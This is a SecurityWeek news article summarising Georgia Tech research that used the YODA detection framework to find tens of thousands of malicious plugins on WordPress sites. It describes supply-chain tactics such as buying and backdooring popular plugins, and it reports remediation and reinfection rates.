Virtual Event Today: Cyber AI & Automation Summit - Register/Login Now
Connect with us

Hi, what are you looking for?


Malware & Threats

Malicious Plugins Found on 25,000 WordPress Websites: Study

Researchers at Georgia Institute of Technology have identified malicious plugins on tens of thousands of WordPress websites.

Researchers at Georgia Institute of Technology have identified malicious plugins on tens of thousands of WordPress websites.

An analysis of nightly backups of more than 400,000 unique web servers has revealed the existence of more than 47,000 malicious plugins installed on nearly 25,000 unique WordPress websites. More than 94% of these plugins (over 44,000) continue to be in use today.

Over 3,600 of the identified malicious plugins were purchased from legitimate marketplaces such as CodeCanyon, Easy Digital Downloads, and ThemeForest. The majority of these plugins did not use obfuscation to hide their malicious behavior, the academics say in a research paper.

The dataset used for the research spanned over a period of eight years, between July 2012 and July 2020, and revealed a steady increase in the number of installed malicious plugins, with the activity reaching a peak in March 2020.

According to the researchers, adversaries buy the codebase of popular free plugins and then add malicious code and wait for users to apply automatic updates. Attackers were also observed impersonating benign plugin authors to distribute malware via pirated plugins.

“While the website owners trusted the plugin ecosystem and spent a total of $7.3M on only the plugins in our dataset, we found that this trust is often broken for the attackers’ monetary gains,” the academics say.

For their analysis, the researchers built an automated framework for malicious plugin detection and tracking, called YODA, which was deployed against the dataset of 400,000 web servers belonging to customers of website backup provider CodeGuard.

Of the identified malicious plugins, more than 10,000 used webshells and code obfuscation. The researchers also identified cases of plugin-to-plugin infection, where a malicious plugin infects other plugins on the same web server, replicating its behavior.

Advertisement. Scroll to continue reading.

Overall, more than 40,000 of plugin instances were infected post-deployment. In many cases, attackers abused the infrastructure to inject malicious plugins into websites, and then attempted to maintain access to the web servers.

Some of the behaviors in the identified malicious plugins were popular in late 2012, while others were introduced more recently. Regardless of age, however, the behaviors remain prevalent in present-day malicious plugins.

The researchers also discovered more than 6,000 plugins that impersonated benign plugins available through legitimate marketplaces, while offering a trial option to website owners, something that is not typically available in most paid plugin marketplaces.

The results of the analysis were reported to CodeGuard and work is underway to remediate the situation. However, the academics say that only 10% of website owners were seen attempting to clean up their installations, and more than 12% of the cleaned-up websites were reinfected.

Related: Unpatched WPBakery WordPress Plugin Vulnerability Increasingly Targeted in Attacks

Related: Exploited Vulnerability Patched in WordPress Plugin With Over 1 Million Installations

Related: Large-Scale Attack Targeting Tatsu Builder WordPress Plugin

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join us as we delve into the transformative potential of AI, predictive ChatGPT-like tools and automation to detect and defend against cyberattacks.


As cybersecurity breaches and incidents escalate, the cyber insurance ecosystem is undergoing rapid and transformational change.


Expert Insights

Related Content


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Malware & Threats

The NSA and FBI warn that a Chinese state-sponsored APT called BlackTech is hacking into network edge devices and using firmware implants to silently...


No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.


The recent ransomware attack targeting Rackspace was conducted by a cybercrime group named Play using a new exploitation method, the cloud company revealed this...

Malware & Threats

Threat actors are increasingly abusing Microsoft OneNote documents to deliver malware in both targeted and spray-and-pray campaigns.